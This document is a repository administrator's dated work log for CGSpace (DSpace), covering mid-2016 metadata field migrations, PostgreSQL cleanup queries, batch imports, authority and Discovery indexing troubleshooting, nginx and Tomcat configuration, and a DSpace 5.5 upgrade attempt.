  • +

    Identify and propose the next phase of CGSpace fields to migrate:

    +
      +
    • dc.title.jtitle → cg.title.journal
    • +
    • dc.identifier.status → cg.identifier.status
    • +
    • dc.river.basin → cg.river.basin
    • +
    • dc.Species → cg.species
    • +
    • dc.targetaudience → cg.targetaudience
    • +
    • dc.fulltextstatus → cg.fulltextstatus
    • +
    • dc.editon → cg.edition
    • +
    • dc.isijournal → cg.isijournal
    • +
    +
  • +
  • +

    Start a test rebase of the 5_x-prod branch on top of the dspace-5.5 tag

    +
  • +
  • +

    There were a handful of conflicts that I didn’t understand

    +
  • +
  • +

    After completing the rebase I tried to build with the module versions Atmire had indicated as being 5.5 ready but I got this error:

    +
  • +
+
[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:5.5: Could not find artifact com.atmire:atmire-metadata-quality-api:jar:5.5-2.10.1-0 in sonatype-releases (https://oss.sonatype.org/content/repositories/releases/) -> [Help 1]
+
    +
  • I’ve sent them a question about it
  • +
  • A user mentioned having problems with uploading a 33 MB PDF
  • +
  • I told her I would increase the limit temporarily tomorrow morning
  • +
  • Turns out she was able to decrease the size of the PDF so we didn’t have to do anything
  • +
+

2016-05-12

+
    +
  • Looks like the issue that Abenet was having a few days ago with “Connection Reset” in Firefox might be due to a Firefox 46 issue: https://bugzilla.mozilla.org/show_bug.cgi?id=1268775
  • +
  • I finally found a copy of the latest CG Core metadata guidelines and it looks like we can add a few more fields to our next migration: +
      +
    • dc.rplace.region → cg.coverage.region
    • +
    • dc.cplace.country → cg.coverage.country
    • +
    +
  • +
  • Questions for CG people: +
      +
    • Our dc.place and dc.srplace.subregion could both map to cg.coverage.admin-unit?
    • +
    • Should we use dc.contributor.crp or cg.contributor.crp for the CRP (ours is dc.crsubject.crpsubject)?
    • +
    • Our dc.contributor.affiliation and dc.contributor.corporate could both map to dc.contributor and possibly dc.contributor.center depending on if it’s a CG center or not
    • +
    • dc.title.jtitle could either map to dc.publisher or dc.source depending on how you read things
    • +
    +
  • +
  • Found ~200 messed up CIAT values in dc.publisher:
  • +
+
# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to '%  %';
+

2016-05-13

+
    +
  • More theorizing about CGcore
  • +
  • Add two new fields: +
      +
    • dc.srplace.subregion → cg.coverage.admin-unit
    • +
    • dc.place → cg.place
    • +
    +
  • +
  • dc.place is our own field, so it’s easy to move
  • +
  • I’ve removed dc.title.jtitle from the list for now because there’s no use moving it out of DC until we know where it will go (see discussion yesterday)
  • +
+

2016-05-18

+
    +
  • Work on 707 CCAFS records
  • +
  • They have thumbnails on Flickr and elsewhere
  • +
  • In OpenRefine I created a new filename column based on the thumbnail column with the following GREL:
  • +
+
if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
+
    +
  • Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL
  • +
  • So for the hqdefault.jpg ones I just take the UUID (-2) and use it as the filename
  • +
  • Before importing with SAFBuilder I tested adding “__bundle:THUMBNAIL” to the filename column and it works fine
  • +
+

2016-05-19

+
    +
  • More quality control on filename field of CCAFS records to make processing in shell and SAFBuilder more reliable:
  • +
+
value.replace('_','').replace('-','')
+
    +
  • We need to hold off on moving dc.Species to cg.species because it is only used for plants, and might be better to move it to something like cg.species.plant
  • +
  • And dc.identifier.fund is MOSTLY used for CPWF project identifier but has some other sponsorship things +
      +
    • We should move PN*, SG*, CBA, IA, and PHASE* values to cg.identifier.cpwfproject
    • +
    • The rest, like BMGF and USAID etc, might have to go to either dc.description.sponsorship or cg.identifier.fund (not sure yet)
    • +
    • There are also some mistakes in CPWF’s things, like “PN 47”
    • +
    • This ought to catch all the CPWF values (there don’t appear to be any SG* values):
    • +
    +
  • +
+
# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
+

2016-05-20

+
    +
  • More work on CCAFS Video and Images records
  • +
  • For SAFBuilder we need to modify filename column to have the thumbnail bundle:
  • +
+
value + "__bundle:THUMBNAIL"
+
    +
  • Also, I fixed some weird characters using OpenRefine’s transform with the following GREL:
  • +
+
value.replace(/\u0081/,'')
+
    +
  • Write shell script to resize thumbnails with height larger than 400: https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256
  • +
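  • The idea is roughly the following (a simplified sketch with ImageMagick; the actual script is in the gist):

$ for thumb in *.jpg; do [ "$(identify -format '%h' "$thumb")" -gt 400 ] && mogrify -resize x400 "$thumb"; done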
  • Upload 707 CCAFS records to DSpace Test
  • +
  • A few miscellaneous fixes for XMLUI display niggles (spaces in item lists and link target _black): #224
  • +
  • Work on configuration changes for Phase 2 metadata migrations
  • +
+

2016-05-23

+
    +
  • Try to import the CCAFS Images and Videos to CGSpace but had some issues with LibreOffice and OpenRefine
  • +
  • LibreOffice drops empty cells when it exports, so all the fields shift over to the left and URLs end up in Subjects, etc.
  • +
  • Google Docs does this better, but somehow reorders the rows and when I paste the thumbnail/filename row in they don’t match!
  • +
  • I will have to try later
  • +
+

2016-05-30

+
    +
  • Export CCAFS video and image records from DSpace Test using the migrate option (-m):
  • +
+
$ mkdir ~/ccafs-images
+$ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~/ccafs-images -n 0 -m
+
    +
  • And then import to CGSpace:
  • +
+
$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
+
    +
  • But now we have double authors for “CGIAR Research Program on Climate Change, Agriculture and Food Security” in the authority
  • +
  • I’m trying to do a Discovery index before messing with the authority index
  • +
  • Looks like we are missing the index-authority cron job, so who knows what’s up with our authority index
  • +
  • Run system updates on DSpace Test, re-deploy code, and reboot the server
  • +
  • Clean up and import ~200 CTA records to CGSpace via CSV like:
  • +
+
$ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
+$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &> ~/CTA-May30/CTA-42229.log
+
    +
  • Discovery indexing took a few hours for some reason, and after that I started the index-authority script
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
+

2016-05-31

+
    +
  • The index-authority script ran over night and was finished in the morning
  • +
  • Hopefully this was because we haven’t been running it regularly and it will speed up next time
  • +
  • I am running it again with a timer to see:
  • +
+
$ time /home/cgspace.cgiar.org/bin/dspace index-authority
+Retrieving all data
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
+Cleaning the old index
+Writing new data
+All done !
+
+real    37m26.538s
+user    2m24.627s
+sys     0m20.540s
+
    +
  • Update tomcat7 crontab on CGSpace and DSpace Test to have the index-authority script that we were missing
  • +
  • Add new ILRI subject and CCAFS project tags to input-forms.xml (#226, #225)
  • +
  • Manually mapped the authors of a few old CCAFS records to the new CCAFS authority UUID and re-indexed authority indexes to see if it helps correct those items.
  • +
  • Re-sync DSpace Test data with CGSpace
  • +
  • Clean up and import ~65 more CTA items into CGSpace
  • +
diff --git a/docs/2016-06/index.html b/docs/2016-06/index.html (new file)

June, 2016

+ +
+

2016-06-01

+ +
dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
+UPDATE 497
+dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
+UPDATE 14
+
    +
  • Fix a few minor miscellaneous issues in dspace.cfg (#227)
  • +
+

2016-06-02

+
    +
  • Testing the configuration and theme changes for the upcoming metadata migration and I found some issues with cg.coverage.admin-unit
  • +
  • Seems that the Browse configuration in dspace.cfg can’t handle the ‘-’ in the field name:
  • +
+
webui.browse.index.12 = subregion:metadata:cg.coverage.admin-unit:text
+
    +
  • But actually, I think since DSpace 4 or 5 (we are 5.1) the Browse indexes come from Discovery (defined in discovery.xml) so this is really just a parsing error
  • +
  • I’ve sent a message to the DSpace mailing list to ask about the Browse index definition
  • +
  • A user was having problems with submission and from the stacktrace it looks like a Sherpa/Romeo issue
  • +
  • I found a thread on the mailing list talking about it and there is bug report and a patch: https://jira.duraspace.org/browse/DS-2740
  • +
  • The patch applies successfully on DSpace 5.1 so I will try it later
  • +
+

2016-06-03

+
    +
  • Investigating the CCAFS authority issue, I exported the metadata for the Videos collection
  • +
  • The top two authors are:
  • +
+
CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::500
+CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::600
+
    +
  • So the only difference is the “confidence”
  • +
  • Ok, well THAT is interesting:
  • +
+
dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
+ text_value |              authority               | confidence
+------------+--------------------------------------+------------
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, Alan |                                      |         -1
+ Orth, Alan |                                      |         -1
+ Orth, Alan |                                      |         -1
+ Orth, Alan |                                      |         -1
+ Orth, A.   | 05c2c622-d252-4efb-b9ed-95a07d3adf11 |         -1
+ Orth, A.   | 05c2c622-d252-4efb-b9ed-95a07d3adf11 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, Alan | ad281dbf-ef81-4007-96c3-a7f5d2eaa6d9 |        600
+ Orth, Alan | ad281dbf-ef81-4007-96c3-a7f5d2eaa6d9 |        600
+(13 rows)
+
    +
  • And now an actually relevant example:
  • +
+
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
+ count
+-------
+   707
+(1 row)
+
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
+ count
+-------
+   253
+(1 row)
+
    +
  • Trying something experimental:
  • +
+
dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+UPDATE 960
+
    +
  • And then re-indexing authority and Discovery…?
  • +
  • After Discovery reindex the CCAFS authors are all together in the Authors sidebar facet
  • +
  • The docs for the ORCiD and Authority stuff for DSpace 5 mention changing the browse indexes to use the Authority as well:
  • +
+
webui.browse.index.2 = author:metadataAuthority:dc.contributor.author:authority
+
    +
  • That would only be for the “Browse by” function… so we’ll have to see what effect that has later
  • +
+

2016-06-04

+
    +
  • Re-sync DSpace Test with CGSpace and perform test of metadata migration again
  • +
  • Run phase two of metadata migrations on CGSpace (see the migration notes)
  • +
  • Run all system updates and reboot CGSpace server
  • +
+

2016-06-07

+
    +
  • Figured out how to export a list of the unique values from a metadata field ordered by count:
  • +
+
dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=29 group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
+
    +
  • +

    Identified the next round of fields to migrate:

    +
      +
    • dc.title.jtitle → dc.source
    • +
    • dc.crsubject.crpsubject → cg.contributor.crp
    • +
    • dc.contributor.affiliation → cg.contributor.affiliation
    • +
    • dc.Species → cg.species
    • +
    • dc.contributor.corporate → dc.contributor
    • +
    • dc.identifier.url → cg.identifier.url
    • +
    • dc.identifier.doi → cg.identifier.doi
    • +
    • dc.identifier.googleurl → cg.identifier.googleurl
    • +
    • dc.identifier.dataurl → cg.identifier.dataurl
    • +
    +
  • +
  • +

    Discuss pulling data from IFPRI’s ContentDM with Ryan Miller

    +
  • +
  • +

    Looks like OAI is kinda obtuse for this, and if we use ContentDM’s API we’ll be able to access their internal field names (rather than trying to figure out how they stuffed them into various, repeated Dublin Core fields)

    +
  • +
+

2016-06-08

+ +
$ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
+
    +
  • Write to Atmire about the use of atmire.orcid.id to see if we can change it
  • +
  • Seems to be a virtual field that is queried from the authority cache… hmm
  • +
  • In other news, I found out that the About page that we haven’t been using lives in dspace/config/about.xml, so now we can update the text
  • +
  • File bug about closed="true" attribute of controlled vocabularies not working: https://jira.duraspace.org/browse/DS-3238
  • +
+

2016-06-09

+
    +
  • Atmire explained that the atmire.orcid.id field doesn’t exist in the schema, as it actually comes from the authority cache during XMLUI run time
  • +
  • This means we don’t see it when harvesting via OAI or REST, for example
  • +
  • They opened a feature ticket on the DSpace tracker to ask for support of this: https://jira.duraspace.org/browse/DS-3239
  • +
+

2016-06-10

+
    +
  • Investigating authority confidences
  • +
  • It looks like the values are documented in Choices.java
  • +
  • Experiment with setting all 960 CCAFS author values to be 500:
  • +
+
dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+
+dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
+UPDATE 960
+
    +
  • After the database edit, I did a full Discovery re-index
  • +
  • And now there are exactly 960 items in the authors facet for ‘CGIAR Research Program on Climate Change, Agriculture and Food Security’
  • +
  • Now I ran the same on CGSpace
  • +
  • Merge controlled vocabulary functionality for animal breeds to 5_x-prod (#236)
  • +
  • Write python script to update metadata values in batch via PostgreSQL: fix-metadata-values.py
  • +
  • We need to use this to correct some pretty ugly values in fields like dc.description.sponsorship
  • +
  • Merge item display tweaks from earlier this week (#231)
  • +
  • Merge controlled vocabulary functionality for subregions (#238)
  • +
+

2016-06-11

+
    +
  • Merge controlled vocabulary for sponsorship field (#239)
  • +
  • Fix character encoding issues for animal breed lookup that I merged yesterday
  • +
+

2016-06-17

+
    +
  • Linode has free RAM upgrades for their 13th birthday so I migrated DSpace Test (4→8GB of RAM)
  • +
+

2016-06-18

+
    +
  • +

    Clean up titles and hints in input-forms.xml to use title/sentence case and a few more consistency things (#241)

    +
  • +
  • +

    The final list of fields to migrate in the third phase of metadata migrations is:

    +
      +
    • dc.title.jtitle → dc.source
    • +
    • dc.crsubject.crpsubject → cg.contributor.crp
    • +
    • dc.contributor.affiliation → cg.contributor.affiliation
    • +
    • dc.srplace.subregion → cg.coverage.subregion
    • +
    • dc.Species → cg.species
    • +
    • dc.contributor.corporate → dc.contributor
    • +
    • dc.identifier.url → cg.identifier.url
    • +
    • dc.identifier.doi → cg.identifier.doi
    • +
    • dc.identifier.googleurl → cg.identifier.googleurl
    • +
    • dc.identifier.dataurl → cg.identifier.dataurl
    • +
    +
  • +
  • +

    Interesting “Sunburst” visualization on a Digital Commons page: http://www.repository.law.indiana.edu/sunburst.html

    +
  • +
  • +

    Final testing on metadata fix/delete for dc.description.sponsorship cleanup

    +
  • +
  • +

    Need to run fix-metadata-values.py and then delete-metadata-values.py

    +
  • +
+

2016-06-20

+
    +
  • CGSpace’s HTTPS certificate expired last night and I didn’t notice, had to renew:
  • +
+
# /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
+
    +
  • I really need to fix that cron job…
  • +
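  • Something like this in root’s crontab would do it, reusing the same renew command (the schedule here is just a placeholder):

0 3 1 * * /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start" > /var/log/letsencrypt/renew.log 2>&1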
+

2016-06-24

+
    +
  • Run the replacements/deletes for dc.description.sponsorship (investors) on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
+$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
+
+

2016-06-28

+
    +
  • Testing the cleanup of dc.contributor.corporate with 13 deletions and 121 replacements
  • +
  • There are still ~97 values for which no action was indicated
  • +
  • After the above deletions and replacements I regenerated a CSV and sent it to Peter et al to have a look
  • +
+
dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=126 group by text_value order by count desc) to /tmp/contributors-june28.csv with csv;
+
    +
  • Re-evaluate dc.contributor.corporate and it seems we will move it to dc.contributor.author as this is more in line with how editors are actually using it
  • +
+

2016-06-29

+
    +
  • Test run of migrate-fields.sh with the following re-mappings:
  • +
+
72  55  #dc.source
+86  230 #cg.contributor.crp
+91  211 #cg.contributor.affiliation
+94  212 #cg.species
+107 231 #cg.coverage.subregion
+126 3   #dc.contributor.author
+73  219 #cg.identifier.url
+74  220 #cg.identifier.doi
+79  222 #cg.identifier.googleurl
+89  223 #cg.identifier.dataurl
+
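  • For reference, migrate-fields.sh presumably just loops over a mapping like the one above and issues one UPDATE per pair — a minimal sketch (the mapping file name and psql invocation are my assumptions):

#!/usr/bin/env bash
# read "old new #comment" field ID pairs and migrate each one
while read -r old new _; do
    [ -z "$old" ] && continue
    psql -d cgspace -c "UPDATE metadatavalue SET metadata_field_id=${new} WHERE metadata_field_id=${old}"
done < field-mappings.txt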
    +
  • Run all cleanups and deletions of dc.contributor.corporate on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
+$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
+
    +
  • Re-deploy CGSpace and DSpace Test with latest June changes
  • +
  • Now the sharing and Altmetric bits are more prominent:
  • +
+

DSpace 5.1 XMLUI With Altmetric Badge

+
    +
  • Run all system updates on the servers and reboot
  • +
  • Start working on config changes for phase three of the metadata migrations
  • +
+

2016-06-30

+
    +
  • Wow, there are 95 authors in the database who have ‘,’ at the end of their name:
  • +
+
# select text_value from  metadatavalue where metadata_field_id=3 and text_value like '%,';
+
    +
  • We need to use something like this to fix them, need to write a proper regex later:
  • +
+
# update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
+
diff --git a/docs/2016-07/index.html b/docs/2016-07/index.html (new file)

July, 2016

+ +
+

2016-07-01

+
    +
  • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
  • +
  • I think this query should find and replace all authors that have “,” at the end of their names:
  • +
+
dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+ text_value
+------------
+(0 rows)
+
    +
  • In this case the select query was showing 95 results before the update
  • +
+

2016-07-02

+
    +
  • Comment on DSpace Jira ticket about author lookup search text (DS-2329)
  • +
+

2016-07-04

+
    +
  • Seems the database’s author authority values mean nothing without the authority Solr core from the host where they were created!
  • +
+

2016-07-05

+
    +
  • Amend backup-solr.sh script so it backs up the entire Solr folder
  • +
  • We really only need statistics and authority but meh
  • +
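  • Backing up the entire folder presumably amounts to a tar of [dspace]/solr, something like (the backup destination is an assumption):

$ tar czf /home/backup/solr-$(date +%Y-%m-%d).tar.gz -C /home/cgspace.cgiar.org solr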
  • Fix metadata for species on DSpace Test:
  • +
+
$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
+
    +
  • Will run later on CGSpace
  • +
  • A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is “ungraded”
  • +
  • I tested the patch for DS-2740 that I had found last month and it seems to work
  • +
  • I will merge it to 5_x-prod
  • +
+

2016-07-06

+
    +
  • Delete 23 blank metadata values from CGSpace:
  • +
+
cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+DELETE 23
+
    +
  • Complete phase three of metadata migration, for the following fields: +
      +
    • dc.title.jtitle → dc.source
    • +
    • dc.crsubject.crpsubject → cg.contributor.crp
    • +
    • dc.contributor.affiliation → cg.contributor.affiliation
    • +
    • dc.Species → cg.species
    • +
    • dc.srplace.subregion → cg.coverage.subregion
    • +
    • dc.contributor.corporate → dc.contributor.author
    • +
    • dc.identifier.url → cg.identifier.url
    • +
    • dc.identifier.doi → cg.identifier.doi
    • +
    • dc.identifier.googleurl → cg.identifier.googleurl
    • +
    • dc.identifier.dataurl → cg.identifier.dataurl
    • +
    +
  • +
  • Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)
  • +
+
$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
+$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
+
    +
  • I then ran all server updates and rebooted the server
  • +
+

2016-07-11

+
    +
  • Doing some author cleanups from Peter and Abenet:
  • +
+
$ ./fix-metadata-values.py -i /tmp/Authors-Fix-205-UTF8.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
+$ ./delete-metadata-values.py -f dc.contributor.author -i /tmp/Authors-Delete-UTF8.csv -m 3 -u dspacetest -d dspacetest -p fuuu
+

2016-07-13

+
    +
  • Run the author cleanups on CGSpace and start a full Discovery re-index
  • +
+

2016-07-14

+
    +
  • Test LDAP settings for new root LDAP
  • +
  • Seems to work when binding as a top-level user
  • +
+

2016-07-18

+
    +
  • Adjust identifiers in XMLUI item display to be more prominent
  • +
  • Add species and breed to the XMLUI item display
  • +
  • CGSpace crashed late at night and the DSpace logs were showing:
  • +
+
2016-07-18 20:26:30,941 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - 
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+...
+
    +
  • I suspect it’s someone hitting REST too much:
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
+    710 66.249.78.38
+   1781 181.118.144.29
+  24904 70.32.99.142
+
    +
  • I just blocked access to /rest for that last IP for now:
  • +
+
     # log rest requests
+     location /rest {
+         access_log /var/log/nginx/rest.log;
+         proxy_pass http://127.0.0.1:8443;
+         deny 70.32.99.142;
+     }
+

2016-07-21

+ +

2016-07-22

+
    +
  • Help Paola from CCAFS with thumbnails for batch uploads
  • +
  • She has been struggling to get the dimensions right, and manually enlarging smaller thumbnails, renaming PNGs to JPG, etc
  • +
  • Altmetric reports having an issue with some of our authors being doubled…
  • +
  • This is related to authority and confidence!
  • +
  • We might need to use index.authority.ignore-prefered=true to tell the Discovery index to prefer the variation that exists in the metadatavalue rather than what it finds in the authority cache.
  • +
  • Trying these on DSpace Test after a discussion by Daniel Scharon on the dspace-tech mailing list:
  • +
+
index.authority.ignore-prefered.dc.contributor.author=true
+index.authority.ignore-variants.dc.contributor.author=false
+
    +
  • After reindexing I don’t see any change in Discovery’s display of authors, and still have entries like:
  • +
+
Grace, D. (464)
+Grace, D. (62)
+
    +
  • I asked for clarification of the following options on the DSpace mailing list:
  • +
+
index.authority.ignore
+index.authority.ignore-prefered
+index.authority.ignore-variants
+
    +
  • In the mean time, I will try these on DSpace Test (plus a reindex):
  • +
+
index.authority.ignore=true
+index.authority.ignore-prefered=true
+index.authority.ignore-variants=true
+
    +
  • Enabled usage of X-Forwarded-For in DSpace admin control panel (#255)
  • +
  • It was misconfigured and disabled, but already working for some reason sigh
  • +
  • … no luck. Trying with just:
  • +
+
index.authority.ignore=true
+
    +
  • After re-indexing and clearing the XMLUI cache nothing has changed
  • +
+

2016-07-25

+
    +
  • Trying a few more settings (plus reindex) for Discovery on DSpace Test:
  • +
+
index.authority.ignore-prefered.dc.contributor.author=true
+index.authority.ignore-variants=true
+
    +
  • Run all OS updates and reboot DSpace Test server
  • +
  • No changes to Discovery after reindexing… hmm.
  • +
  • Integrate and massively clean up About page (#256)
  • +
+

About page

+
    +
  • The DSpace source code mentions the configuration key discovery.index.authority.ignore-prefered.* (with prefix of discovery, despite the docs saying otherwise), so I’m trying the following on DSpace Test:
  • +
+
discovery.index.authority.ignore-prefered.dc.contributor.author=true
+discovery.index.authority.ignore-variants=true
+
    +
  • Still no change!
  • +
  • Deploy species, breed, and identifier changes to CGSpace, as well as About page
  • +
  • Run Linode RAM upgrade (8→12GB)
  • +
  • Re-sync DSpace Test with CGSpace
  • +
  • I noticed that our backup scripts don’t send Solr cores to S3 so I amended the script
  • +
+
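  • The amendment presumably boils down to syncing the Solr backups to S3, roughly like this (assuming s3cmd and a hypothetical bucket name):

$ s3cmd sync --delete-removed /home/backup/solr/ s3://cgspace-backups/solr/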

2016-07-31

+
    +
  • Work on removing Dryland Systems and Humidtropics subjects from Discovery sidebar and Browse by
  • +
  • Also change “Subjects” to “AGROVOC keywords” in Discovery sidebar/search and Browse by (#257)
  • +
diff --git a/docs/2016-08/index.html b/docs/2016-08/index.html (new file)

August, 2016

+ +
+

2016-08-01

+
    +
  • Add updated distribution license from Sisay (#259)
  • +
  • Play with upgrading Mirage 2 dependencies in bower.json because most are several versions out of date
  • +
  • Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more
  • +
  • bower stuff is a dead end, waste of time, too many issues
  • +
  • Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 because the fonts are requested from an incorrect path)
  • +
  • Start working on DSpace 5.1 → 5.5 port:
  • +
+
$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+
    +
  • Lots of conflicts that don’t make sense (ie, shouldn’t conflict!)
  • +
  • This file in particular conflicts almost 10 times: dspace/modules/xmlui-mirage2/src/main/webapp/themes/CGIAR/styles/_style.scss
  • +
  • Checking out a clean branch at 5.5 and cherry-picking our commits works where that file would normally have a conflict
  • +
  • Seems to be related to merge commits
  • +
  • git rebase --preserve-merges doesn’t seem to help
  • +
  • Eventually I just turned on git rerere and solved the conflicts and completed the 403 commit rebase
  • +
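  • For reference, enabling rerere is just a one-time git config switch:

$ git config rerere.enabled true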
  • The 5.5 code now builds but doesn’t run (white page in Tomcat)
  • +
+

2016-08-02

+
    +
  • Ask Atmire for help with DSpace 5.5 issue
  • +
  • Vanilla DSpace 5.5 deploys and runs fine
  • +
  • Playing with DSpace in Ubuntu 16.04 and Tomcat 7
  • +
  • Everything is still fucked up, even vanilla DSpace 5.5
  • +
+

2016-08-04

+
    +
  • Ask on DSpace mailing list about duplicate authors, Discovery and author text values
  • +
  • Atmire responded with some new DSpace 5.5 ready versions to try for their modules
  • +
+

2016-08-05

+
    +
  • Fix item display incorrectly displaying Species when Breeds were present (#260)
  • +
  • Experiment with fixing more authors, like Delia Grace:
  • +
+
dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
+

2016-08-06

+
    +
  • Finally figured out how to remove “View/Open” and “Bitstreams” from the item view
  • +
+

2016-08-07

+
    +
  • Start working on Ubuntu 16.04 Ansible playbook for Tomcat 8, PostgreSQL 9.5, Oracle Java 8, etc
  • +
+

2016-08-08

+
    +
  • Still troubleshooting Atmire modules on DSpace 5.5
  • +
  • Vanilla DSpace 5.5 works on Tomcat 7…
  • +
  • Ooh, and vanilla DSpace 5.5 works on Tomcat 8 with Java 8!
  • +
  • Some notes about setting up Tomcat 8, since it’s new on this machine…
  • +
  • Install latest Oracle Java 8 JDK
  • +
  • Create setenv.sh in Tomcat 8 libexec/bin directory:
  • +
+
CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
+CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
+
+JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
+
    +
  • Edit Tomcat 8 server.xml to add regular HTTP listener for solr
  • +
  • Symlink webapps:
  • +
+
$ rm -rf /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
+$ ln -sv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
+$ ln -sv ~/dspace/webapps/oai /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/oai
+$ ln -sv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/jspui
+$ ln -sv ~/dspace/webapps/rest /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/rest
